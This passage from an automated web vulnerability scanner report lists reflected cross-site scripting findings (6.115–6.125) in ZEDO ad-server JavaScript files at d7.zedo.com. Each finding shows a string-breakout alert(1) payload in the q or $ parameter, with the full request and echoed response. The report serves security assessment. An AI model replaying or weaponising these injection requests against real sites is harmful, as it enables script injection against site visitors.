Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:01:25 GMT
Date: Sun, 24 Apr 2011 16:00:37 GMT
Connection: close
Content-Length: 2436

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='d50f2";alert(1)//e6acc4c239';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d50f2";alert(1)//e6acc4c239;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.115. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2977'%3balert(1)//082145c33fa was submitted in the q parameter. This input was echoed as b2977';alert(1)//082145c33fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=b2977'%3balert(1)//082145c33fa&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Sun, 24 Apr 2011 16:00:26 GMT
Date: Sun, 24 Apr 2011 15:59:48 GMT
Connection: close
Content-Length: 2414

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='b2977';alert(1)//082145c33fa';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b2977';alert(1)//082145c33fa;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

6.116. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb8cf"%3balert(1)//dee7a01f909 was submitted in the $ parameter. This input was echoed as cb8cf";alert(1)//dee7a01f909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=cb8cf"%3balert(1)//dee7a01f909&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:cb8cf";alert(1)//dee7a01f909;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:49 GMT
Connection: close
Content-Length: 2417

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',cb8cf";alert(1)//dee7a01f909';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,cb8cf";alert(1)//dee7a01f909;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.117. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99c32'%3balert(1)//a68f0dfa7c4 was submitted in the $ parameter. This input was echoed as 99c32';alert(1)//a68f0dfa7c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=99c32'%3balert(1)//a68f0dfa7c4&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:99c32';alert(1)//a68f0dfa7c4;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=35
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:50 GMT
Connection: close
Content-Length: 2417

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',99c32';alert(1)//a68f0dfa7c4';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,99c32';alert(1)//a68f0dfa7c4;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

6.118. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22fbc"%3balert(1)//e02967c910 was submitted in the q parameter. This input was echoed as 22fbc";alert(1)//e02967c910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=22fbc"%3balert(1)//e02967c910&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:49 GMT
Connection: close
Content-Length: 2427

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='22fbc";alert(1)//e02967c910';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=22fbc";alert(1)//e02967c910;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.119. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124ac'%3balert(1)//4def8a3b3be was submitted in the q parameter. This input was echoed as 124ac';alert(1)//4def8a3b3be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=124ac'%3balert(1)//4def8a3b3be&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=36
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:49 GMT
Connection: close
Content-Length: 2424

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='124ac';alert(1)//4def8a3b3be';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=124ac';alert(1)//4def8a3b3be;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

6.120. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e66c"%3balert(1)//a4d47dcac89 was submitted in the $ parameter. This input was echoed as 8e66c";alert(1)//a4d47dcac89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=8e66c"%3balert(1)//a4d47dcac89&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:8e66c";alert(1)//a4d47dcac89;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=8lO0TcGt89avfdx48NK0JKoe~042411;expires=Wed, 21 Apr 2021 16:46:42 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:42 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=219
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:42 GMT
Connection: close
Content-Length: 1970

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',8e66c";alert(1)//a4d47dcac89';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,8e66c";alert(1)//a4d47dcac89;z="+Math.random();}

var zzhasAd=undefined;


                   var zzStr = "s=376;u=unknown;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var
...[SNIP]...

6.121. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81cd'%3balert(1)//f0a4b8b13dd was submitted in the $ parameter. This input was echoed as d81cd';alert(1)//f0a4b8b13dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=d81cd'%3balert(1)//f0a4b8b13dd&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:d81cd';alert(1)//f0a4b8b13dd;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=81O0TcGt89Ymg7tTRZIhVI6Y~042411;expires=Wed, 21 Apr 2021 16:46:43 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:42 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=219
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:46:43 GMT
Connection: close
Content-Length: 1970

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',d81cd';alert(1)//f0a4b8b13dd';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,d81cd';alert(1)//f0a4b8b13dd;z="+Math.random();}

var zzhasAd=undefined;


                   var zz
...[SNIP]...

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54297'%3balert(1)//d2ae17e8182 was submitted in the $ parameter. This input was echoed as 54297';alert(1)//d2ae17e8182 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=3&q=&$=54297'%3balert(1)//d2ae17e8182&s=376&z=0.8531599652840236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,21; FFad=0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:54297';alert(1)//d2ae17e8182;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=228
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:33 GMT
Connection: close
Content-Length: 1405

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',54297';alert(1)//d2ae17e8182';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,54297';alert(1)//d2ae17e8182;z="+Math.random();}

if(zzuid=='unknown')zzuid='xlO0TcGt89Z-t7Q0A2jzc9p9~042411';

var zzhasA
...[SNIP]...

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e4f8"%3balert(1)//1334fc783cc was submitted in the $ parameter. This input was echoed as 5e4f8";alert(1)//1334fc783cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=3&q=&$=5e4f8"%3balert(1)//1334fc783cc&s=376&z=0.8531599652840236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,21; FFad=0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=809:5e4f8";alert(1)//1334fc783cc;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=228
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:33 GMT
Connection: close
Content-Length: 1405

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat=',5e4f8";alert(1)//1334fc783cc';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5e4f8";alert(1)//1334fc783cc;z="+Math.random();}

if(zzuid=='unknown')zzuid='xlO0TcGt89Z-t7Q0A2jzc9p9~042411';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63c79"%3balert(1)//6d4fc709a8e was submitted in the q parameter. This input was echoed as 63c79";alert(1)//6d4fc709a8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=21&q=63c79"%3balert(1)//6d4fc709a8e&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:37 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=7VO0TcGt89bp-ycDzEVya7r-~042411;expires=Wed, 21 Apr 2021 16:46:37 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=224
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:37 GMT
Connection: close
Content-Length: 1967

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='63c79";alert(1)//6d4fc709a8e';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=63c79";alert(1)//6d4fc709a8e;z="+Math.random();}

var zzhasAd=undefined;


                   var zzStr = "s=376;u=unknown;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var
...[SNIP]...

6.125. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51435"%3balert(1)//b3de24d718e was submitted in the q parameter. This input was echoed as 51435";alert(1)//b3de24d718e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=3&q=51435"%3balert(1)//b3de24d718e&$=&s=376&z=0.8531599652840236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
